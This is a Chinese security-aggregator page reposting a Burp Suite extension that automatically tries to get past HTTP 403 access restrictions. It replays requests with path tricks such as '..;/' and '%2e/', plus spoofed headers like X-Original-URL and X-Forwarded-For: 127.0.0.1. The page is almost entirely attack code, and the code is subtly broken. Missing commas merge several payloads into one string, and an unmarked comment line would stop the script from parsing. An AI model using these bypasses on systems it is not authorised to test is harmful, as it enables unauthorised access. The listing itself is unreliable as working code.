记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

BurpSuite之403绕过插件(403Bypass)

2020-11-26 10:06

BurpSuite之403绕过插件(403Bypass)-极度安全

Payloads

温馨提示:终身会员登陆后查看

插件安装

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

403bypasser.py

  1. from burp import IBurpExtender
  2. from burp import IScannerCheck
  3. from burp import IScanIssue
  4. from java.io import PrintWriter
  5. from array import array
  6. import re
  7. class BurpExtender(IBurpExtender, IScannerCheck):
  8.     #
  9.     # implement IBurpExtender
  10.     #
  11.     def registerExtenderCallbacks(self, callbacks):
  12.         # keep a reference to our callbacks object
  13.         self._callbacks = callbacks
  14.         # obtain an extension helpers object
  15.         self._helpers = callbacks.getHelpers()
  16.         # set our extension name
  17.         callbacks.setExtensionName("403 Directory Bypasser")
  18.         self.stdout = PrintWriter(callbacks.getStdout(), True)
  19.         self.stderr = PrintWriter(callbacks.getStderr(), True)
  20.         # register ourselves as a custom scanner check
  21.         callbacks.registerScannerCheck(self)
  22.     # helper method to search a response for occurrences of a literal match string
  23.     # and return a list of start/end offsets
  24.     def _get_matches(self, sttcode):
  25.         #response = self._helpers.bytesToString(response)
  26.         if sttcode == 403:
  27.             return True
  28.         return False
  29.     def rplHeader(self, headerStr, headerName, newHeader):
  30.         headerStr = re.sub('^'+headerName+':.*?$', newHeader, headerStr, flags=re.I|re.M)
  31.         return headerStr
  32.     def doPassiveScan(self, baseRequestResponse):
  33.         # look for matches of our passive check grep string
  34.         matches = self._get_matches(self._helpers.analyzeResponse(baseRequestResponse.getResponse()).getStatusCode())
  35.         if matches == False:
  36.             return None
  37.         OldReq = self._helpers.bytesToString(baseRequestResponse.getRequest())
  38.         Rurl = self._helpers.analyzeRequest(baseRequestResponse).getUrl().getPath()
  39.         if Rurl != "/":
  40.             Rurl = self._helpers.analyzeRequest(baseRequestResponse).getUrl().getPath().rstrip("/")
  41.         PreviousPath = '/'.join(str(Rurl).split('/')[:-1])
  42.         LastPath = str(Rurl).split('/')[-1]
  43.         self.stdout.println("Scanning: "+Rurl)
  44.         self.stdout.println(self._helpers.analyzeRequest(baseRequestResponse).getHeaders())
  45.         payloads = ["%2e/"+LastPath, LastPath+"/.""./"+LastPath+"/./", LastPath+"%20/""%20"+LastPath+"%20/", LastPath+"..;/",LastPath+"?",LastPath+"??","/"+LastPath+"//",LastPath+"/",LastPath+"/.randomstring"]
  46.         hpayloads = ["X-Rewrite-URL: /"+LastPath, "X-Custom-IP-Authorization: 127.0.0.1""X-Original-URL: /"+LastPath,"Referer: /"+LastPath,"X-Originating-IP: 127.0.0.1","X-Forwarded-For: 127.0.0.1","X-Remote-IP: 127.0.0.1","X-Client-IP: 127.0.0.1","X-Host: 127.0.0.1","X-Forwared-Host: 127.0.0.1"]
  47.         results = []
  48.         for p in payloads:
  49.             NewReq = OldReq.replace(Rurl, PreviousPath+"/"+p)
  50.             checkRequestResponse = self._callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), self._helpers.stringToBytes(NewReq))
  51.             # self.stdout.println(self._helpers.analyzeRequest(checkRequestResponse).getUrl().getPath())
  52.             STT_CODE = self._helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode()
  53.             if STT_CODE == 200:
  54.                 results.append("Url payload: "+self._helpers.analyzeRequest(checkRequestResponse).getUrl().getPath() + " | Status code: "+str(STT_CODE))
  55.         for hp in hpayloads:
  56.             if hp.startswith("Referer:") and "Referer:" in OldReq:
  57.                 NewReq = self.rplHeader(OldReq, "Referer", hp) #.replace("User-Agent: ", hp+"\r\n"+"User-Agent: ")
  58.             else:
  59.                 NewReq = OldReq.replace("User-Agent: ", hp+"\r\n"+"User-Agent: ")
  60.             # self.stdout.println(NewReq)
  61.             checkRequestResponse = self._callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), self._helpers.stringToBytes(NewReq))
  62.             STT_CODE = self._helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode()
  63.             if STT_CODE == 200:
  64.                 results.append("Header payload: "+hp + " | Status code: "+str(STT_CODE))
  65.         if len(results) == 0:
  66.             return None
  67.         return [CustomScanIssue(
  68.             baseRequestResponse.getHttpService(),
  69.             self._helpers.analyzeRequest(baseRequestResponse).getUrl(),
  70.             [self._callbacks.applyMarkers(baseRequestResponse, None, None)],
  71.             "403 Bypass Vuln",
  72.             '<br>'.join(results),
  73.             "High")]
  74.     def consolidateDuplicateIssues(self, existingIssue, newIssue):
  75.         # This method is called when multiple issues are reported for the same URL
  76.         # path by the same extension-provided check. The value we return from this
  77.         # method determines how/whether Burp consolidates the multiple issues
  78.         # to prevent duplication
  79.         #
  80.         # Since the issue name is sufficient to identify our issues as different,
  81.         # if both issues have the same name, only report the existing issue
  82.         # otherwise report both issues
  83.         if existingIssue.getUrl() == newIssue.getUrl():
  84.             return -1
  85.         return 0
  86. #
  87. class implementing IScanIssue to hold our custom scan issue details
  88. #
  89. class CustomScanIssue (IScanIssue):
  90.     def __init__(self, httpService, url, httpMessages, name, detail, severity):
  91.         self._httpService = httpService
  92.         self._url = url
  93.         self._httpMessages = httpMessages
  94.         self._name = name
  95.         self._detail = detail
  96.         self._severity = severity
  97.     def getUrl(self):
  98.         return self._url
  99.     def getIssueName(self):
  100.         return self._name
  101.     def getIssueType(self):
  102.         return 0
  103.     def getSeverity(self):
  104.         return self._severity
  105.     def getConfidence(self):
  106.         return "Certain"
  107.     def getIssueBackground(self):
  108.         pass
  109.     def getRemediationBackground(self):
  110.         pass
  111.     def getIssueDetail(self):
  112.         return self._detail
  113.     def getRemediationDetail(self):
  114.         pass
  115.     def getHttpMessages(self):
  116.         return self._httpMessages
  117.     def getHttpService(self):
  118.         return self._httpService

知识来源: https://www.secvery.com/4160.html

阅读:205611 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“BurpSuite之403绕过插件(403Bypass)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持·广告位💖

标签云